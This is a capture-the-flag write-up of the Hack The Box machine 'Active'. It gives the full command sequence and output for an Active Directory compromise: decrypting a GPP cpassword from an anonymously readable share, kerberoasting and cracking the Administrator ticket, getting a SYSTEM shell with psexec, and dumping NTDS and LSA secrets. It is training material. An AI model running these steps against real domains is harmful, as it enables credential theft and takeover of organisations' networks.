HTB - Active

Enumeration

Scope

IP Address: 10.10.10.100

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ sudo nmap -p- -sU --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ nmap -p53,88,135,139,389,445 $ip -sCV -oN Nmap/script-scan

PORT    STATE SERVICE       VERSION
53/tcp  open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-08 10:27:39Z)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-08T10:27:50
|_  start_date: 2024-07-08T10:23:10
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

* Open ports: 53,88,135,139,389,445
* UDP Open ports: 53,88, 389, 123
* Services: DNS - SMB - RPC - KERBEROS - LDAP
* Versions: DNS 6.1.7601 - smb2
* Important Notes: (Windows Server 2008 R2 SP1) - (Domain: active.htb)

Enumeration

DNS

I always try zone transfer if DNS exists on the machine

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ dig axfr active.htb @$ip            

; <<>> DiG 9.19.19-1-Debian <<>> axfr active.htb @10.10.10.100
;; global options: +cmd
; Transfer failed.

RPC

No much information from rpcclient

rpcclient $> srvinfo
        10.10.10.100   Wk Sv PDC Tim NT     Domain Controller
        platform_id     :       500
        os version      :       6.1
        server type     :       0x80102b

rpcclient $> enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED

SMB

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ smbclient -N -L //$ip                            
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u ''  -p '' --shares              

SMB         10.10.10.100    445    DC               [+] active.htb\: 
SMB         10.10.10.100    445    DC               [+] Enumerated shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.100    445    DC               C$                              Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON                        Logon server share 
SMB         10.10.10.100    445    DC               Replication     READ            
SMB         10.10.10.100    445    DC               SYSVOL                          Logon server share 
SMB         10.10.10.100    445    DC               Users

smbclinet & crackmapexec got some useful information and I can see that I have read access on Replication share

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u ''  -p '' --shares --share Replication -M spider_plus

<snip>
SPIDER_P... 10.10.10.100    445    DC   [*]     OUTPUT: /tmp/cme_spider_plus

Looking at the share content and one file took my attention

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ cat /tmp/cme_spider_plus/10.10.10.100.json       

<snip>
        "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml": {
            "atime_epoch": "2018-07-21 06:37:44",
            "ctime_epoch": "2018-07-21 06:37:44",
            "mtime_epoch": "2018-07-21 06:38:11",
            "size": "533 Bytes"
<snip>

I hurried to Download the file

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ smbclient -N \\\\$ip\\Replication
Anonymous login successful

smb: \> cd active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

                5217023 blocks of size 4096. 219815 blocks available

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml

getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec

Exploring the content of Groups.xml there is a username called SVC_TGS and cpassword field

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ cat Groups.xml                            
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

I think this encrypted blob is GPP password stands for Group Policy Prefrences

I can decrypt this with gpp-decrypt

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18

So, We got credentials active.htb\SVC_TGS:GPPstillStandingStrong2k18, Let's verify with crackmapexec

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u 'SVC_TGS'  -p 'GPPstillStandingStrong2k18'

SMB    10.10.10.100  445    DC   [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18

Initial Access

we don't have any remote access to the machine, So I will do two things
- Exploring the shares with the credentials we found
- fire up bloodhound-python and enumerate the domain with the credentials we found

First: Listing all the shares to see if we have Read or Write access to any of them and Exploring the shares with crackmapexec and spider_plus module which will save us a lot of time

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]                                                                                
└─$ crackmapexec smb $ip -u 'SVC_TGS'  -p 'GPPstillStandingStrong2k18' --shares

SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18                               
SMB         10.10.10.100    445    DC               [+] Enumerated shares                                                           
SMB         10.10.10.100    445    DC               Share           Permissions     Remark                                          
SMB         10.10.10.100    445    DC               -----           -----------     ------                                          
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin                                    
SMB         10.10.10.100    445    DC               C$                              Default share                                   
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC                                      
SMB         10.10.10.100    445    DC               NETLOGON        READ            Logon server share                              
SMB         10.10.10.100    445    DC               Replication     READ
SMB         10.10.10.100    445    DC               SYSVOL          READ            Logon server share                              
SMB         10.10.10.100    445    DC               Users           READ

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u 'SVC_TGS'  -p 'GPPstillStandingStrong2k18' --shares -M spider_plus
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
SPIDER_P... 10.10.10.100    445    DC               [*] Started spidering plus with option:
SPIDER_P... 10.10.10.100    445    DC               [*]        DIR: ['print$']
SPIDER_P... 10.10.10.100    445    DC               [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.10.10.100    445    DC               [*]       SIZE: 51200
SPIDER_P... 10.10.10.100    445    DC               [*]     OUTPUT: /tmp/cme_spider_plus

After exploring the json file that crackmap produced, I didn't file anythind except the user flag

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ cat /tmp/cme_spider_plus/10.10.10.100.json

<snip>
        "SVC_TGS/Desktop/user.txt": {
            "atime_epoch": "2018-07-21 10:49:25",
            "ctime_epoch": "2018-07-21 10:49:25",
            "mtime_epoch": "2024-07-08 06:24:13",
            "size": "34 Bytes"
        },
        "desktop.ini": {
            "atime_epoch": "2009-07-14 00:57:55",
            "ctime_epoch": "2009-07-14 00:57:55",
            "mtime_epoch": "2018-07-16 17:01:17",
            "size": "174 Bytes"
<snip>

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ smbclient -U SVC_TGS \\\\$ip\\Users
Password for [WORKGROUP\SVC_TGS]:

smb: \> cd SVC_TGS
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> get user.txt

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ cat user.txt                                     
f709db3ff2f43edafbbbe37523313a6f

User Flag: f709db3ff2f43edafbbbe37523313a6f

Privilege Escalation

Before we run bloodhound, Let's update /etc/hosts for bloodhound.py to run without issues

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ sudo sh -c "echo  '$ip active.htb dc.active.htb' >> /etc/hosts"

Collecting information about the domain

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ bloodhound-python -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -ns $ip -d active.htb -c all

INFO: Found AD domain: active.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 5 users
INFO: Found 41 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.active.htb
INFO: Done in 00M 19S

Prepare zip file to upload to bloodhound

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ zip active.zip *.json         
  adding: 20240708065240_computers.json (deflated 70%)
  adding: 20240708065240_containers.json (deflated 93%)
  adding: 20240708065240_domains.json (deflated 76%)
  adding: 20240708065240_gpos.json (deflated 85%)
  adding: 20240708065240_groups.json (deflated 94%)
  adding: 20240708065240_ous.json (deflated 64%)
  adding: 20240708065240_users.json (deflated 89%)

Start neo4j database and run bloodhoud GUI

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ sudo neo4j start                            
[sudo] password for kali: 
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:110854). It is available at http://localhost:7474
There may be a short delay until the server is ready.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ bloodhound

When a looking for kerberostable accounts query, I found that the administrator account can be obtained by kerberoasting attack only if his password is weak enough to be cracked

Verify with GetUserSPN.py from impacket toolkit

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ impacket-GetUserSPNs active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip $ip         
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2024-07-08 06:24:15.286149

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ impacket-GetUserSPNs active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip $ip -request-user administrator

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2024-07-08 06:24:15.286149             

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c233cdd02329afd2b7649d5184cc54db$800253e137d9967a72a671946c5f1438152116efa46e73742436eca0a710a3d3775023ff9d34eaac31e4880aa3b8fa4b9703546afcb0c30badfb4a0377e0defd7ca3e63018c0c9ac1006b66d10365a5333103fc5f1de89aaccd5cfec9c86dce40c203b3f211b58fd45c3f923ba9353ef77e4de052665ad85cf4838536f296b67493e12c52a008d48ba6ef630d716d867a26e3782562fb62418d92e23747e01d25698c86eeb0b53a92ccc18d735a1fd99dcd6f624b4261a351858c37ac0079c40d7ded94f93a4d9ed684b4f05036ea99ef375774591b82b42200a69600dc80763723a9cbf63f917b07e527ef6aa08b73d34f388f4187e019ea76a4650f5ad05c2d87ba34ec932d13a552bf0acfde0a4a84812be185000f18c0731789e91a005ea75e69845de3f214a0ff47f32c8bdf0a2401b0d817fd575346c61e55b43cda59127a6476025aab1185e428e58f25ed0efd7eff72ce9e1c20632f82006931eb8c2286cbf671676475428b1da63e3545481a01440c90c902493f8fb5540e3dcc3ead68834a5a4bb991ef99ccffc8a56bcf9f0dadd42cd40e3b07095d0df521e159957ce38b5a1a5774bc63213ce86ffa7379505017716a71715daeea9f8678ffd7ad6353ab5adca847f9ac1dd46d4d0f7c26121c07ce2d12eca242acc3fff492f8a73af347f241bcdba48fd1f18f04595153f64e9d19c42b2b16fc0573df672695ec7dc1a545b3e7f75ed82175904e7a61ac28a89e15ddaeaee84bbcbb00dadb261df8fd0806770af501e80e93d0311685f3bae6ccb286adc882626a8f1fffd946293f664b5787a0259d3094677cd229566d97744e3cb6c23b0a3fed3e3250c4fae46b0cb0cb3da081fc78d497995a3220f7e451f282c88ce77cf137d22454a226dfca1af61bfaadfa3122e68b35b3919bd81e0f324c65c1a340f1a711ac6bcd56a012f0c2f85aaeeab13161eb68abd75db71e6f66b594ae0e24a5c0bffcb8d58bc9a48374a4f0a1c9431d9bb13a324ff8f2446724e3a059431a6ca67570db3c2c02ef520a105be7e2463ca1d874ff66d74b95b9800d59240841676dda6f9eb4e13086daf53e51e9868b0d692ef73dabd623e35055a7965a827d8db8b7ce22b4ea4b1ee8299d8b8d9fcb5889fc37e9440de93696b936ab6dcee1fea229858c948c63f57e851a1ede5daad03dd12d70bace5f32a781384c07fe6e2dfaf5eaadc3050d8020548f22f4c8b76bf950af2d5232261c1d797f019258edf46

you can use -o to output to file but I didn't

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ hashcat -m 13100 admin.hash /usr/share/wordlists/rockyou.txt 

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c233cdd02329afd2b7649d5184cc54db$800253e137d9967a72a671946c5f1438152116efa46e73742436eca0a710a3d3775023ff9d34eaac31e4880aa3b8fa4b9703546afcb0c30badfb4a0377e0defd7ca3e63018c0c9ac1006b66d10365a5333103fc5f1de89aaccd5cfec9c86dce40c203b3f211b58fd45c3f923ba9353ef77e4de052665ad85cf4838536f296b67493e12c52a008d48ba6ef630d716d867a26e3782562fb62418d92e23747e01d25698c86eeb0b53a92ccc18d735a1fd99dcd6f624b4261a351858c37ac0079c40d7ded94f93a4d9ed684b4f05036ea99ef375774591b82b42200a69600dc80763723a9cbf63f917b07e527ef6aa08b73d34f388f4187e019ea76a4650f5ad05c2d87ba34ec932d13a552bf0acfde0a4a84812be185000f18c0731789e91a005ea75e69845de3f214a0ff47f32c8bdf0a2401b0d817fd575346c61e55b43cda59127a6476025aab1185e428e58f25ed0efd7eff72ce9e1c20632f82006931eb8c2286cbf671676475428b1da63e3545481a01440c90c902493f8fb5540e3dcc3ead68834a5a4bb991ef99ccffc8a56bcf9f0dadd42cd40e3b07095d0df521e159957ce38b5a1a5774bc63213ce86ffa7379505017716a71715daeea9f8678ffd7ad6353ab5adca847f9ac1dd46d4d0f7c26121c07ce2d12eca242acc3fff492f8a73af347f241bcdba48fd1f18f04595153f64e9d19c42b2b16fc0573df672695ec7dc1a545b3e7f75ed82175904e7a61ac28a89e15ddaeaee84bbcbb00dadb261df8fd0806770af501e80e93d0311685f3bae6ccb286adc882626a8f1fffd946293f664b5787a0259d3094677cd229566d97744e3cb6c23b0a3fed3e3250c4fae46b0cb0cb3da081fc78d497995a3220f7e451f282c88ce77cf137d22454a226dfca1af61bfaadfa3122e68b35b3919bd81e0f324c65c1a340f1a711ac6bcd56a012f0c2f85aaeeab13161eb68abd75db71e6f66b594ae0e24a5c0bffcb8d58bc9a48374a4f0a1c9431d9bb13a324ff8f2446724e3a059431a6ca67570db3c2c02ef520a105be7e2463ca1d874ff66d74b95b9800d59240841676dda6f9eb4e13086daf53e51e9868b0d692ef73dabd623e35055a7965a827d8db8b7ce22b4ea4b1ee8299d8b8d9fcb5889fc37e9440de93696b936ab6dcee1fea229858c948c63f57e851a1ede5daad03dd12d70bace5f32a781384c07fe6e2dfaf5eaadc3050d8020548f22f4c8b76bf950af2d5232261c1d797f019258edf46:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked

We can now access the machine with psexec.py

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ impacket-psexec active.htb/administrator@$ip                                                      
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file CBbnwhxB.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service zrRP on 10.10.10.100.....
[*] Starting service zrRP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Users\Administrator\Desktop> type root.txt
1457083f7ac23289ea1098e5d56b170a

Root Flag: 1457083f7ac23289ea1098e5d56b170a

Optional

We can dump ntds database and lsass secrets

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u 'administrator'  -p 'Ticketmaster1968' --ntds
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)
SMB         10.10.10.100    445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.10.100    445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:5ffb4aaaf9b63dc519eca04aec0e8bed:::
SMB         10.10.10.100    445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.100    445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b889e0d47d6fe22c8f0463a717f460dc:::
SMB         10.10.10.100    445    DC               active.htb\SVC_TGS:1103:aad3b435b51404eeaad3b435b51404ee:f54f3a1d3c38140684ff4dad029f25b5:::
SMB         10.10.10.100    445    DC               DC$:1000:aad3b435b51404eeaad3b435b51404ee:e7d22f7ed282e717e70932379c13647f:::
SMB         10.10.10.100    445    DC               [+] Dumped 5 NTDS hashes to /home/kali/.cme/logs/DC_10.10.10.100_2024-07-08_071457.ntds of which 4 were added to the database

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]                                                                                
└─$ crackmapexec smb $ip -u 'administrator'  -p 'Ticketmaster1968' --lsa                                                            
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (sig
ning:True) (SMBv1:False)                                                                                                            
SMB         10.10.10.100    445    DC               [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)                          
SMB         10.10.10.100    445    DC               [+] Dumping LSA secrets                                                         
SMB         10.10.10.100    445    DC               ACTIVE\DC$:aes256-cts-hmac-sha1-96:79b6d316156d3adda6dac63d42c62e39defdb0fe596ba
9a67d958f8a2244a3cb                                                                                                                 
SMB         10.10.10.100    445    DC               ACTIVE\DC$:aes128-cts-hmac-sha1-96:a097c725db114d4e9912c88a6a4802b9             
SMB         10.10.10.100    445    DC               ACTIVE\DC$:des-cbc-md5:4fec461f26b3b983                                         
SMB         10.10.10.100    445    DC               ACTIVE\DC$:plain_password_hex:56439006925cc9699de9fad166e23f6c756cbe57a31d2cbf4e
0651b501079bde4e55914516fa162b7f43ecaecc7df69e7d29daa58a4fbe3a1ac10c2d75f5aee35b0a5b38b9f9dc436f5285a0a9b6c87bf1985892067f5b16c844d1
1ba8cb81f2740ada2e816ba55cde13439e296ab577e8366135f5e493ff00bc38ebe5fdc0b774fb53d627ce1e4481635732cd8300bc107bf9d9db260cf4b41079cc0b
59f95b714a3d6d31262c4eb20b3be09424f8b5da292a72cb3f41277ad78283dca948583ea7a8ede269f057aa8196f42088e2075067a3139800c48b38e8518629d039
1a24f20e3a121998d958daf80231a3f229                                                                                                  
SMB         10.10.10.100    445    DC               ACTIVE\DC$:aad3b435b51404eeaad3b435b51404ee:e7d22f7ed282e717e70932379c13647f::: 
SMB         10.10.10.100    445    DC               (Unknown User):ROOT#123                                                         
SMB         10.10.10.100    445    DC               dpapi_machinekey:0x377bd35be67705f345dabf00d3181e269e0fb1e6                     
dpapi_userkey:0x7586c391e559565c85cb342d1d24546381f0d5cb                                                                            
SMB         10.10.10.100    445    DC               NL$KM:cc6fb846c30c58052ff2072edae6bf7d6063f689e70ed5d522ee54da63125bb5d8da0bb782
0e3de19d7a0315085cb0aeef6391b96c8765a8146295bc77697708                                                                              
SMB         10.10.10.100    445    DC               [+] Dumped 8 LSA secrets to /home/kali/.cme/logs/DC_10.10.10.100_2024-07-08_0714
00.secrets and /home/kali/.cme/logs/DC_10.10.10.100_2024-07-08_071400.cached

PreviousHTB- Access NextHTB - Forest

Last updated 1 year ago

hashtagEnumeration

hashtagInitial Access

hashtagPrivilege Escalation

hashtagOptional

Enumeration

Initial Access

Privilege Escalation

Optional